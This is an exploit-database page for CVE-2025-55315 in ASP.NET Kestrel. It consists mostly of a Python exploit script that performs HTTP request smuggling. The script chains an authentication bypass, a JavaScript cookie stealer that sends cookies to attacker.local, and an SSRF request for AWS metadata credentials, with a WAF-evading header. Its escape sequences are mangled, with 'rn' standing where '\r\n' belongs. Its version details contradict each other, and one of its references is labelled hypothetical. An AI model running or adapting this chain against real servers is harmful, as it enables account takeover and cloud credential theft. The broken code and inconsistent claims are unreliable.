Skip to main content
Home/Exploits/WebApps/ASP.net 8.0.10 – Bypass
EXPLOIT

ASP.net 8.0.10 – Bypass

CVE ID: CVE-2025-55315
Vulnerability Type: Unknown
Author: Mohammed Idrees Banyamer
Categories: WebApps

ASP.net 8.0.10 – Bypass

Proof of Concept (PoC)

poc.py 
# Exploit Title: ASP.net  8.0.10 - Bypass
# Date: 2025-11-03
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# CVE: CVE-2025-55315
# Tested on: .NET Kestrel (unpatched) - ASP.NET Core on localhost (lab environment)
# Platform: remote
# Type: webapps
# Attack Vector: Network (HTTP/HTTPS) - Remote exploitation via malformed chunked encoding
# CVSS: 9.8 (Critical) - Estimated: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
#
# Description:
#   This exploit demonstrates a critical HTTP Request Smuggling vulnerability in
#   unpatched versions of .NET Kestrel due to improper handling of malformed
#   chunk extensions (LF-only line endings). The script performs:
#     1. Automatic fingerprinting to detect vulnerable instances
#     2. Auth bypass to access restricted endpoints (/admin)
#     3. Session hijacking via response queue poisoning (JS cookie stealer)
#     4. SSRF to internal metadata services (e.g., AWS 169.254.169.254)
#   Includes WAF bypass using 'chUnKEd' header and generates detailed JSON reports.
#
#   The vulnerability allows full remote compromise: authentication bypass,
#   session theft, and internal network access — all from a single HTTP request.
#
#   Patched in .NET 9.0.1 / 8.0.10+ (October 2025).
#
# IMPORTANT SAFETY :
#   -  DO NOT RUN AGAINST PRODUCTION OR THIRD-PARTY SYSTEMS.
#   - Use only in isolated environments (VM, Docker with --network none).
#   - All payloads are educational and non-destructive by design.
#   - Modify payloads only within your controlled lab.
#
# References:
#   - CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-55315
#   - Microsoft Security Advisory (hypothetical): https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55315


from __future__ import annotations
import socket
import ssl
import time
import argparse
import json
import os
from typing import Tuple, Optional

DEFAULT_TIMEOUT = 3.0
READ_CHUNK = 4096
REPORT_DIR = "kestrel_desync_reports"
os.makedirs(REPORT_DIR, exist_ok=True)

# ------------------ Utilities ------------------
def now_iso() -> str:
    return time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime())

def hexdump(b: bytes, maxlen: int = 200) -> str:
    shown = b[:maxlen]
    hexed = ' '.join(f"{x:02x}" for x in shown)
    return f"{hexed} ..." if len(b) > maxlen else hexed

def save_file(path: str, data: bytes) -> None:
    try:
        with open(path, 'wb') as f:
            f.write(data)
        print(f"[+] Saved: {path}")
    except Exception as e:
        print(f"[!] Save failed: {e}")

# ------------------ Networking ------------------
def send_http(host: str, port: int, data: bytes, use_tls: bool = False) -> Tuple[Optional[bytes], bool]:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(DEFAULT_TIMEOUT)
    try:
        if use_tls:
            ctx = ssl.create_default_context()
            s = ctx.wrap_socket(s, server_hostname=host)
        s.connect((host, port))
        s.sendall(data)

        parts = []
        while True:
            try:
                chunk = s.recv(READ_CHUNK)
                if not chunk: break
                parts.append(chunk)
            except socket.timeout:
                break
        resp = b''.join(parts)

        s.settimeout(0.2)
        try:
            s.recv(1)
            open_flag = True
        except:
            open_flag = False
        s.close()
        return resp, open_flag
    except Exception:
        return None, False

# ------------------ Request Builder (WAF Bypass) ------------------
def build_chunked(method: str, path: str, body: bytes, extra_headers: list = None) -> bytes:
    headers = [
        f"{method} {path} HTTP/1.1",
        "Host: localhost",
        "Transfer-Encoding: chUnKEd",  # WAF Bypass
        "Content-Type: text/plain",
    ]
    if extra_headers:
        headers.extend(extra_headers)
    headers.extend(["", ""])
    return "rn".join(headers).encode() + body

# ------------------ Fingerprint ------------------
def fingerprint(host: str, port: int, use_tls: bool) -> Tuple[bool, Optional[bytes]]:
    print(f"[*] Fingerprinting {host}:{port}...")
    payload = b"1nxn0nn"
    req = build_chunked("POST", "/", payload)
    resp, _ = send_http(host, port, req, use_tls)
    if resp and b"400" not in resp.split(b'rn', 1)[0]:
        print(f"[!] VULNERABLE: Accepted LF-only chunk!")
        return True, resp
    print(f"[+] Patched: 400 Bad Request")
    return False, resp

# ------------------ Exploit Chain ------------------
def exploit_chain(host: str, port: int, use_tls: bool):
    results = []

    # 1. Auth Bypass
    print(f"[!] 1. Auth Bypass → /admin")
    smug_admin = b"0rnrnGET /admin HTTP/1.1rnHost: localhostrnX-Bypass: yesrnrn"
    req1 = build_chunked("POST", "/", b"1;extnxn" + smug_admin, ["Content-Length: 50"])
    resp1, _ = send_http(host, port, req1, use_tls)
    if resp1 and (b"admin" in resp1.lower() or b"dashboard" in resp1.lower()):
        results.append("Auth Bypass: SUCCESS")
        save_file(os.path.join(REPORT_DIR, f"admin_page_{host}_{port}.html"), resp1)
    else:
        results.append("Auth Bypass: FAILED")

    # 2. Session Hijacking
    print(f"[!] 2. Session Hijacking → JS Stealer")
    js_payload = (
        b"0rnrnGET / HTTP/1.1rnHost: localhostrn"
        b"Content-Type: text/htmlrnContent-Length: 120rnrn"
        b"<script>fetch('http://attacker.local/steal?c='+document.cookie)</script>"
    )
    req2 = build_chunked("POST", "/", b"1;extnxn" + js_payload)
    send_http(host, port, req2, use_tls)
    results.append("Session Hijack: INJECTED")

    # 3. SSRF
    print(f"[!] 3. SSRF → AWS Metadata")
    ssrf = b"0rnrnGET http://169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1rnHost: localhostrnrn"
    req3 = build_chunked("POST", "/", b"1;extnxn" + ssrf)
    resp3, _ = send_http(host, port, req3, use_tls)
    if resp3 and b"role" in resp3:
        results.append("SSRF: SUCCESS")
        save_file(os.path.join(REPORT_DIR, f"ssrf_metadata_{host}_{port}.txt"), resp3)
    else:
        results.append("SSRF: FAILED")

    return results

# ------------------ Reporting ------------------
def save_json_report(host: str, port: int, use_tls: bool, results: list):
    report = {
        "target": f"{host}:{port}",
        "tls": use_tls,
        "timestamp": now_iso(),
        "cve": "CVE-2025-55315",
        "status": "VULNERABLE",
        "waf_bypass": "chUnKEd",
        "exploits": results
    }
    path = os.path.join(REPORT_DIR, f"REPORT_{host}_{port}_{int(time.time())}.json")
    with open(path, 'w', encoding='utf-8') as f:
        json.dump(report, f, indent=2)
    print(f"[+] JSON Report: {path}")

# ------------------ CLI ------------------
def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("target", help="host:port or host:port:tls")
    args = parser.parse_args()

    parts = args.target.split(":")
    host = parts[0]
    port = int(parts[1])
    use_tls = len(parts) > 2 and parts[2].lower() in ("tls", "1")

    print(f"n=== Kestrel Desync Full Chain ===nTarget: {host}:{port} (TLS: {use_tls})n")

    is_vuln, _ = fingerprint(host, port, use_tls)
    if not is_vuln:
        print("[+] Target is patched. Exiting.")
        return

    results = exploit_chain(host, port, use_tls)
    save_json_report(host, port, use_tls, results)

    print(f"n[+] Exploitation chain completed!")
    print(f"[+] All files in: {REPORT_DIR}")

if __name__ == "__main__":
    main()

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.

sh3llz@loading:~$
Loading security modules...